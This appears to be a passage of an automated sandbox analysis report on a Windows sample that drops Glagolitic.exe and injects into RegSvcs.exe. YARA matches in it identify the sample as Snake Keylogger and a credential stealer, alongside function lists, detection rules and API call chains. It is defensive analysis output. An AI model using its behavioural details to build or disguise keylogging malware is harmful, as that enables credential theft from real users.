              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00411E780_2_00411E78
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00442E0C0_2_00442E0C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00420EC00_2_00420EC0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044CF170_2_0044CF17
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00444FD20_2_00444FD2
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_03F192300_2_03F19230
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004096A02_2_004096A0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0042200C2_2_0042200C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004041702_2_00404170
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0041A2172_2_0041A217
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004122162_2_00412216
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0042435D2_2_0042435D
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004033C02_2_004033C0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044F4302_2_0044F430
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004125E82_2_004125E8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044663B2_2_0044663B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004138012_2_00413801
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0042096F2_2_0042096F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004129D02_2_004129D0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004119E32_2_004119E3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0041C9AE2_2_0041C9AE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0047EA6F2_2_0047EA6F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0040FA102_2_0040FA10
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044EB5F2_2_0044EB5F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00423C812_2_00423C81
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00411E782_2_00411E78
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00442E0C2_2_00442E0C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00420EC02_2_00420EC0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_0044CF172_2_0044CF17
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00444FD22_2_00444FD2
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_03F64E002_2_03F64E00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_031153703_2_03115370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311D2783_2_0311D278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_031171183_2_03117118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311C1463_2_0311C146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311A0883_2_0311A088
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311C7383_2_0311C738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311C4683_2_0311C468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311CA083_2_0311CA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03113AA13_2_03113AA1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311E9883_2_0311E988
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_031169A03_2_031169A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311CFAB3_2_0311CFAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311CCD83_2_0311CCD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311F6313_2_0311F631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311FA883_2_0311FA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0311E97B3_2_0311E97B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_031129EC3_2_031129EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_031139EF3_2_031139EF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03113E093_2_03113E09
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004096A05_2_004096A0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0042200C5_2_0042200C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004041705_2_00404170
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0041A2175_2_0041A217
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004122165_2_00412216
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0042435D5_2_0042435D
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004033C05_2_004033C0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044F4305_2_0044F430
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004125E85_2_004125E8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044663B5_2_0044663B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004138015_2_00413801
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0042096F5_2_0042096F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004129D05_2_004129D0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004119E35_2_004119E3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0041C9AE5_2_0041C9AE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0047EA6F5_2_0047EA6F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0040FA105_2_0040FA10
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044EB5F5_2_0044EB5F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00423C815_2_00423C81
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00411E785_2_00411E78
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00442E0C5_2_00442E0C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00420EC05_2_00420EC0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_0044CF175_2_0044CF17
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00444FD25_2_00444FD2
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_03EDEE005_2_03EDEE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1C1466_2_00E1C146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1D2786_2_00E1D278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E153706_2_00E15370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1C4686_2_00E1C468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1C7386_2_00E1C738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E169A06_2_00E169A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1E9886_2_00E1E988
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E13AA16_2_00E13AA1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1CA086_2_00E1CA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1CCD86_2_00E1CCD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E19DE06_2_00E19DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E13E096_2_00E13E09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E16FC86_2_00E16FC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1CFA96_2_00E1CFA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1F6316_2_00E1F631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1E97B6_2_00E1E97B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1FA886_2_00E1FA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06521E806_2_06521E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065217A06_2_065217A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06529C706_2_06529C70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065295486_2_06529548
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06520B306_2_06520B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065250286_2_06525028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065229686_2_06522968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06521E706_2_06521E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652DE006_2_0652DE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E6B06_2_0652E6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E6A06_2_0652E6A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E6AF6_2_0652E6AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EF516_2_0652EF51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EF606_2_0652EF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652178F6_2_0652178F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06529C4F6_2_06529C4F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652CCA06_2_0652CCA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D5506_2_0652D550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D5406_2_0652D540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652DDFE6_2_0652DDFE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E2586_2_0652E258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E24A6_2_0652E24A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EAF86_2_0652EAF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EB086_2_0652EB08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06520B206_2_06520B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652F3B86_2_0652F3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06528BA06_2_06528BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065200406_2_06520040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652F8106_2_0652F810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065250186_2_06525018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652F8026_2_0652F802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065200066_2_06520006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652003F6_2_0652003F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D0F86_2_0652D0F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D9996_2_0652D999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D9A86_2_0652D9A8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 0040E710 appears 44 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 00401B10 appears 50 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 00408F40 appears 38 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 004301F8 appears 36 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 004115D7 appears 72 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 00416C70 appears 78 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 004181F2 appears 42 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 00445AE0 appears 130 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 0041341F appears 36 times
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: String function: 00422240 appears 38 times
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: String function: 00445AE0 appears 65 times
              Source: mKRflLn5sx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: mKRflLn5sx.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9920951973062382
              Source: Glagolitic.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9920951973062382
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, --.csBase64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
              Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, --.csBase64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,2_2_00464EAE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464EAE
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
